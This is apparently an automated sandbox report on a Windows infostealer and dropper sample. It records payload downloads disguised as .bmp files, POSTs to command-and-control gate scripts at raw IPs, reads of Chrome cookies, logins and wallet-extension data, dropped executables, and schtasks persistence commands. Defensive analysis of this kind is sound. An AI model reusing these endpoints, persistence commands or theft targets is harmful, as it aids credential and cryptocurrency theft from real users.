request	GET https://sun6-23.userapi.com/c909618/u44017378/docs/d58/502f8d1b7c6f/Synapse.bmp?extra=7ymvw_aFwN4_Uj7FsOWPKcOeA3Uvoj8EikYjHvdatt0X3JP-3DmTnc04rqW9o15Tpv6WRsx3NGvtPS7zQz6ZuNvop6Jj1TXski6zguIEMge-ITDtAes8MpdXIiCKNbvKN4nbBz6NMzSp29ZK
request	GET https://vk.com/doc44017378_668679037?hash=6lxdrm9NUkSryZCfzYZn4zR2sOTXzaKgfQIcVCaPnvX&dl=FLqYTpktPSSWsXhtSyyzRawRyuZZexn7WIKXiXEZBv4&api=1&no_preview=1
request	GET https://psv4.userapi.com/c909328/u44017378/docs/d20/80a165d7642a/3c8fttmg7n06dp.bmp?extra=nuZcn5b8fGh0uPRKfbUAXX0VAMxL-cYveJG88PCotdD--pDq-7gxijOyIWQPtaUUAWSIRH_w1wstuzNboJLwKcBxW1Y6MIjCb1xhxyymyAxolfvAbMP9rCDe9gfZUPLDuOK0pAEC8-MuwAkw
request	GET https://sun6-20.userapi.com/c909618/u44017378/docs/d36/c9a88b9c7135/PL_Client.bmp?extra=tJtT3z6UbzYseJPa76j1zRBj1wmyid3YaDvAzaMsz31tqOzwexxS6SL75PPvYs4H2kzJbhj1WI3RcZekL6A_lMuCQ7wlgzvR82UbZKpo_7rDNXDLKPfZIU6wTZ5q87vSoPPRjK5zIRkegmYD
request	GET https://vk.com/doc44017378_668850966?hash=seNAc9XpZGb24lXnAxVAwPiPVaSTe6IiTQaY7IFhggw&dl=A9mazd4TmUx700iSSJAZzZTPnbX30hG5PEtIhQs2FVw&api=1&no_preview=1#utube
request	GET https://vk.com/doc44017378_668685574?hash=2Z9kWDMxHv9Bg52ieOFMjjyZlIe2LzZhpXJtbJfi2jD&dl=MckLSTrLnFqxzbDQcQsY8zw8KxvNLWnEyU8AMbhyK6s&api=1&no_preview=1#WW1
request	GET https://sun6-21.userapi.com/c909628/u44017378/docs/d11/7f1a7c274f11/WWW1.bmp?extra=ibUwsIlBLQfXz5F54C2lVB4_UNTN1SYsuHJjPdJG1kmKXbQKYUdmzOpzkBzvq_CQ0kTWEzPmDitIXdL62nwV1Wz6vYHp9FTHjt_sDl-d0N1MlyijNg1uwrPaBxnTvlsmksXyhzo9dFkQw3Dx
request	GET https://vk.com/doc44017378_668897025?hash=9izn0TzhC6Gq52AYs6wKluNJs8IMGa5IygoIE2NWiZX&dl=RzpPQgkrU5Bo3xTNnupfnzibo1sU36B0QqzJYdEUq3c&api=1&no_preview=1#redcl
request	GET https://psv4.userapi.com/c235131/u44017378/docs/d5/eb6fe76df516/red.bmp?extra=ME0T5ttRod9kvT9aKKSwe-oAdBL69d6YUKjB4zWwRSSWsFL7VU3KidZTPIhbjE0zWgoso1_RHm-VuqcNV5k7SY-fZDpTkZFPHptlTeudtXPzawqATgpx9GnpEDrul3HPvZeDLFV3JEzI7tmA
request	GET https://vk.com/doc44017378_668777192?hash=bErtt2Itw8CZPTouyuXblBKb3pLfVImQzvGWnZ4CyVs&dl=vm2AArvcYQaQAETnMlmPKTg0CoqMAAqRh2fogvAYbWP&api=1&no_preview=1#tmwvr
request	GET https://sun6-21.userapi.com/c235131/u44017378/docs/d58/cc01f1bebaed/tmvwr.bmp?extra=q1LcznyK48tN8Wen35rZ4SsDNwN0UeWZ55tLITfBZg-6OTIEQfzGqel91B2rOXtWrIKTnt-LHmOoR4Rgiv5jb_s-93At_nSn5l0lxswHLYTdEqposLIc_-NG6GXefWaiEN4nocBNujY4KphO

Sends data using the HTTP POST Method (4 events)

request	POST http://94.142.138.131/api/firecom.php
request	POST http://94.142.138.131/api/firegate.php
request	POST http://45.15.156.229/api/firegate.php
request	POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self

Resolves a suspicious Top Level Domain (TLD) (6 events)

domain	preconcert.pw	description	Palau domain TLD
domain	yandex.ru	description	Russian Federation domain TLD
domain	iplis.ru	description	Russian Federation domain TLD
domain	sso.passport.yandex.ru	description	Russian Federation domain TLD
domain	dzen.ru	description	Russian Federation domain TLD
domain	230809204625331.nes.dtf99.top	description	Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 547 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Sept. 6, 2023, 7:39 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b00000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d82810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d83810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d84810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d85810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d86810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d87810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d88810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d89810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d90810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d91810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d92810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d93810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d94810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d95810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d96810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d97810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d98810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d99810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da0810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da1810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da2810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da3810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da4810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da5810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da6810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da7810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da8810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da9810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076daa810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dab810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dac810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dad810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076dae810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076daf810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db0810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 7:32 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076db1810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff		-1073741800

A process attempted to delay the analysis task. (1 event)

description

qZa2Z7Puv7E4iAuW3ONvhvPf.exe tried to sleep 133 seconds, actually delayed analysis time by 133 seconds

Steals private information from local Internet browsers (19 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (16 events)

file	C:\Users\test22\AppData\Local\Temp\7zSEAF2.tmp\Install.exe
file	C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe
file	C:\Users\test22\Pictures\Minor Policy\hqwRTbVrg6JO8voBy_voyZiR.exe
file	C:\Users\test22\Pictures\Minor Policy\qUbgMoNM2GXIKNuZhrcGVO8V.exe
file	C:\Users\test22\Pictures\Minor Policy\1gOAmuVXzOKI5MyMYhf8xuu4.exe
file	C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe
file	C:\Users\test22\AppData\Local\Temp\7zSE0B1.tmp\Install.exe
file	C:\Users\test22\Pictures\Minor Policy\qyFjl2MYt6qjym_635ASMf8k.exe
file	C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe
file	C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe
file	C:\Users\test22\Pictures\Minor Policy\U5Uc9En5niLiOuW0y1E0qzQw.exe
file	C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe
file	C:\Users\test22\Pictures\Minor Policy\Xk9zE3Cf0Cb9GHLSDNfQ7RMz.exe
file	C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe
file	C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe
file	C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe

Creates hidden or system file (3 events)

Time & API	Arguments	Status	Return
SetFileAttributesW Sept. 6, 2023, 7:32 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1
SetFileAttributesW Sept. 6, 2023, 7:41 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1
SetFileAttributesW Sept. 6, 2023, 7:41 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1

Creates a suspicious process (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline	"C:\Windows\System32\regsvr32.exe" /U .\VVTQR9K.VA3 -s
cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline	regsvr32 /U .\VVTQR9K.VA3 -s

Drops a binary and executes it (8 events)

file	C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe
file	C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe
file	C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe
file	C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe
file	C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe
file	C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe
file	C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe
file	C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\VvTQR9K.VA3

Executes one or more WMI queries (1 event)

wmi	<INVALID POINTER>

A process created a hidden window (9 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 6, 2023, 7:39 a.m.	thread_identifier: 2820 thread_handle: 0x0000056c process_identifier: 2816 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000574	1	1
CreateProcessInternalW Sept. 6, 2023, 7:39 a.m.	thread_identifier: 2888 thread_handle: 0x000005e4 process_identifier: 2884 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000005f0	1	1
